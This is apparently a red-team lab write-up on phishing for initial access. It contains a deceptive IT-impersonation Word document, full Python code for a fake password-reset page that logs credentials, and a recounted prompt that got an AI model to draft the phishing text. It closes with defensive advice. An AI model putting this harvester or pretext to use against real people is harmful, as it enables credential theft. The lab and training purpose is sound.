Initial Access in the Current Cyber Landscape

Every engagement starts with gaining a foothold on your target. MITRE ATT&CK defines Initial Access as the set of techniques adversaries use to gain their first entry into a network, whether that's spearphishing, exploiting a public-facing web app, dropping a USB in a parking lot, or slipping malicious code into a software supply chain.

A few things are worth calling out about the current landscape:

  • Supply chain compromise has become the most common initial access vector in 2026. Almost every modern application depends on third-party libraries, and those libraries are an increasingly attractive target. If an attacker poisons a popular NPM package, every downstream project inherits the backdoor.
  • Social engineering remains the single most reliable vector overall. Humans will always be the weakest part of the attack surface.
  • Phishing and spearphishing continue to deliver results, especially when paired with a believable pretext and a sense of urgency.
  • Macro-based Word attacks, which dominated for years, have been heavily neutered. Microsoft and the endpoint vendors locked macros down hard, and even when a user enables them, modern EDR will usually catch anything suspicious the macro tries to do.

That last point is important, because this lab we will go over today uses a Word document, but not the way you might expect. Instead of leaning on macros, we're using the document as a social engineering delivery vehicle for a credential harvester. The doc itself is benign. The link inside it is the payload. We will we using a fake email here but really any form of communication would work.

Initial Access with Malicious Word Doc Lab

The Scenario

The goal: obtain a valid domain account in the lab's Active Directory environment. Domain accounts are gold because they can be abused for initial access, persistence, privilege escalation, and defense evasion all at once. Getting one pair of valid creds unlocks a lot of opportunities once you're in.

The plan is straightforward:

  1. Draft a phishing document impersonating IT, pushing a fake "mandatory password reset."
  2. Stand up a fake login portal with our Kali machine that logs whatever credentials get submitted.
  3. Embed the portal link in the Word doc.
  4. Deliver the doc to a target user.
  5. Test the harvested creds against a domain-joined machine.

Creating the Phishing Document

I used LibreOffice Writer instead of on the Windows 10 victim box (stand-in for a regular user workstation) and used Claude to do the copywriting. The prompt I used was something like:

"I am an IT administrator at a company called Cyber Corp. I am tasked with notifying all of the employees that due to a recent dark web password leak, we need all employees to visit our login portal to update their passwords within the next 3 days. Failure to do so will mean that their account will be disabled. Please craft a word document to convey this information to them."

To make it more believable you could use an ai detector site to remove some of the AI syntax from the doc so its less obvious but nowadays a lot of business people use AI to write generic documents like this for them. If you know your target organization does this then maybe AI syntax might work in your favor.

The key ingredients here are the ones that all good social engineers use:

  • Authority — the message comes from "IT."
  • Urgency — three-day deadline.
  • Consequence — account disabled if ignored.
  • Plausibility — dark web breaches are in the news constantly, so the premise isn't a stretch.

Once the doc is created save it to the desktop.

This is what my doc looked like:

None
Phishing Document

Creating the Credential Harvesting Site

On the Kali VM, I went to an empty directory and wrote a small Python HTTP server. It serves a convincing-looking "Password Reset" login webpage and logs whatever gets sent back.

from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse

class SimpleLoginHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the login page
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(b"""
        <!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Password Reset</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f4f6f8;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }
    .reset-container {
      background: #fff;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 4px 10px rgba(0,0,0,0.1);
      width: 300px;
      text-align: center;
    }
    h2 {
      margin-bottom: 20px;
      color: #333;
    }
    label {
      display: block;
      text-align: left;
      margin-bottom: 5px;
      font-weight: bold;
    }
    input {
      width: 100%;
      padding: 8px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    button {
      width: 100%;
      padding: 10px;
      background: #0078d7;
      color: #fff;
      border: none;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
    }
    button:hover {
      background: #005a9e;
    }
    .note {
      font-size: 12px;
      color: #666;
      margin-top: 10px;
    }
  </style>
</head>
<body>
  <div class="reset-container">
    <h2>Password Reset</h2>
    <form method="POST" action="/">
      <label for="username">Username or Email</label>
      <input type="text" id="username" name="username" required>

      <label for="password">New Password</label>
      <input type="password" id="password" name="password" required>

      <button type="submit">Reset Password</button>
    </form>
    <p class="note">Enter your account details to reset your password.</p>
  </div>
</body>
</html>

""")

    def do_POST(self):
        # Read and parse form data
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        fields = urllib.parse.parse_qs(post_data.decode())

        username = fields.get("username", [""])[0]
        password = fields.get("password", [""])[0]

        # Log credentials to terminal
        print(f"Username: {username}, Password: {password}")

        # Respond back to browser
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(b"Your password has been successfully updated.")

if __name__ == "__main__":
    server = HTTPServer(("0.0.0.0", 8000), SimpleLoginHandler)
    print("Server running at http://10.0.2.10:8000/")
    server.serve_forever()

This is a fake login page that will log their password when the victim submits it and will make them think that they reset their password.

Lets test it really quick.

On Kali start a python server in the directory w/ the code and go to the link it gives you mine was "http://10.0.2.10:8000/".

The web page should look like this:

None
Fake Webpage

Typing a test password returns this:

None

Back in the terminal we can see we caught the creds:

None
Captured test creds

This could be better if we connected it to a database to have some persistence with the creds but this is enough for a lab environment.

Another good option would be to use wget to clone an existing website to make it look even more legit.

Weaponizing the Document

Back in the Word doc, insert a hyperlink pointing to address http://10.0.2.10:8000/. The anchor text should look legitimate — something like "Cyber Corp Password Portal" — while the underlying URL does the real work. Most users don't hover before they click.

Save the document, and the payload is ready to deliver. In a real engagement this would go out via email, but for this lab the doc just needs to get opened on the target workstation.

Capturing Creds

The target for this lab was the domain user gabbie.fredrika. The user opened the doc, read the urgent note from "IT," clicked the link, and typed her credentials into the fake portal:

None
Capturing Creds
None
Captured Creds

Validating the Creds

Next we need to validate the creds to make sure they work. On the same domained joined target machine, I test the gabbie.fredrika user creds.

None
/priv

Gabbie's account is valid, the domain accepts it, and that's our foothold into the environment. Could have also used evilgenix to validate the creds too.

How to Defend Against Credential Stealers

The attack worked because it bypassed the parts of the environment that defenders tend to focus on (macro blocking, attachment sandboxing) and exploited the part they tend to under focus on (the human). A few practical defenses:

  • Security awareness training focused specifically on urgency-based phishing lures. Employees should be trained to verify any "mandatory reset" notice through a second channel.
  • Link inspection tools like ESET's Link Checker for quickly vetting suspicious URLs before clicking.
  • File scanning via VirusTotal for any attachment that looks off.
  • Malware sandboxes like ANY.RUN for detonating suspicious files in a safe environment.
  • MFA everywhere, ideally phishing-resistant (FIDO2/WebAuthn). A password alone should never be enough to get into anything that matters.
  • Assumed-breach posture. Assume a set of creds will eventually be phished and design internal controls accordingly — network segmentation, tiered admin models, credential guard, LAPS, and aggressive monitoring for anomalous authentication.

One thing worth noting on the defensive side: APTs move slowly. A real advanced adversary might run one command a month to stay under the radar and blend in with normal traffic. Red team engagements are typically compressed into days or weeks, which is why companies are now pushing for longer engagements and assumed-breach scenarios. Companies want to know how well their internal environment holds up once that first set of creds is already compromised.

Conclusion

This lab is a useful reminder that "initial access" doesn't require a zero-day or a slick malware loader. A well-written pretext, a web server, and a clickable link in a Word doc were enough to walk away with valid domain credentials. The technical lift is trivial, the exploit here is almost entirely in the social engineering.

For defenders, the takeaway is that perimeter controls and technical policies aren't enough. You have to assume a user will eventually click something they shouldn't, and your internal environment needs to be resilient when that happens. MFA, segmentation, monitoring, and a strong identity posture are what turn a harvested password from a domain takeover into a minor incident.

For offensive operators, this is a baseline technique to have in the kit. Scale it up with a real phishing infrastructure, a convincing pretext tied to current events at the target organization, and a tool like Evilginx2 for MFA-aware captures, and you're operating the way real threat actors do every day.